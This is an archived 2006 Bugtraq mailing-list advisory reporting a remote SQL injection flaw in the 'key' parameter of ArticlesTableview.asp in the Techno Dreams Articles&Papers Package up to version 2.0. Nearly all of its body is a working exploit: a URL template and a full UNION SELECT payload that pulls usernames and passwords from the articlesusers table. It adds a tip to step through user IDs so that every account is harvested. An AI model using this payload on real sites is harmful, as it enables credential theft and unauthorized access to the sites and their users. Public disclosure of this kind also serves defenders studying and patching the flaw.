
Date: 17 Sep 2006 19:03:46 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: Techno Dreams Articles&Papers Package <=v2.0(ArticlesTableview.asp)
 Remote SQL Injection Vulnerability

Vulnerability Report
*******************************************************************************
# Title  :  Techno Dreams Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.t-dreams.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]

Example: ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18

Pls UserID Change(1,2,3,4,5.....)

# ajann,Turkey
# ...
# Im not Hacker!
